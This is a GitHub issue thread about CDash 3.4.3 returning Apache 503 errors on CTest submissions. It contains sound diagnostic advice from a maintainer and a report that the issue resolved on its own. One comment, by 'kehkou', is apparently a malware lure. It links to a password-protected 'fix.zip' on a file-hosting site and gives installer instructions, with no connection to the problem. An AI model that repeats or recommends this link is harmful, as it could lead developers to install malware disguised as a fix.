### ISSUE TITLE
CDash 3.4.3 - 503 on every submission attempt

### ISSUE THREAD

**Issue by codeling** [Kitware/CDash#2400]
# Bug report

Up until yesterday, everything worked flawlessly, but yesterday CDash suddenly started throwing a 503 error on every submission.

### Expected Behavior

Submission: Files being uploaded.

### Actual Behavior

Submission doesn't work, the following output is shown:
```
Submit files
   SubmitURL: https://cdash.example.com/submit.php?project=MyProject
   Error when uploading file: C:/MyProject/bin/Testing/20240828-1400/Update.xml
   Error message was: 
CURL output: [<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>503 Service Unavailable</title>
</head><body>
<h1>Service Unavailable</h1>
<p>The server is temporarily unable to service your
request due to maintenance downtime or capacity
problems. Please try again later.</p>
</body></html>
]
   Problems when submitting via HTTP
CTest: Finished!
```
(url and folder redacted)

### CDash Version

3.4.3, running under php 8.2.22 on apache shared hoster (directly, i.e. not via docker)

### Additional Information

Not sure how to reproduce - this started happening all of a sudden without apparent cause.

I have no idea how to debug this - there is no log output whatsoever regarding submissions to be found in storage/logs files, they only show entries about removing old builds:
```
[2024-08-29 01:00:01] production.INFO: about to query for builds to remove
[2024-08-29 01:00:01] production.INFO: removing old buildids for projectid: 1
[2024-08-29 01:00:01] production.INFO: removing old buildids for projectid: 1
```
(triggered from a cron job running `php artisan build:remove all`).

Also the php error log does not contain any errors (are there supposed to be, or does CDash anyway redirect all output to its own log?).

The CDash instance is still available via browser and everything looks fine there, so this is something limited to the submission process.

Any information on how I can configure CDash to output more information (log level?) would be highly welcome!

**Comment by kehkou** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by williamjallen** [comment]
The 503 response you posted looks like the standard Apache 503 response, not something CDash generated.  You mentioned running CDash in a subdirectory.  Did you include that subdirectory in your submit URL?  The redacted submit URL you posted doesn't contain a subdirectory in the path.

**Comment by codeling** [comment]
> The 503 response you posted looks like the standard Apache 503 response, not something CDash generated. 

ok, thanks for the information. so the error might happen before the request gets passed to cdash, because of some problematic server config?

> You mentioned running CDash in a subdirectory.
what gave you that impression (maybe the shared hoster bit)? No, I'm running cdash on a subdomain, the actual shown URL of submit.php in the error message is correct.

**Comment by williamjallen** [comment]
> > You mentioned running CDash in a subdirectory.
> 
> what gave you that impression (maybe the shared hoster bit)? No, I'm running cdash on a subdomain, the actual shown URL of submit.php in the error message is correct.

I read "url and folder redacted" and thought that referred to running CDash in a subdirectory.  I understand what you meant by the folder now.

<hr>

A couple more things to check:

1. Is your database running, and is CDash connected to it?  You can check the status with `php artisan db:monitor`.
2. Do you get a JSON error response back from CDash if you navigate to `https://<your cdash>/submit.php` in your browser, or do you see the same 503 error?

**Comment by codeling** [comment]
In the meantime the error does not happen anymore; probably some internal issue on hoster side that has no been resolved.

Thanks for the helpful hints; for the future I'll keep in mind that this is a server issue, not a CDash one!
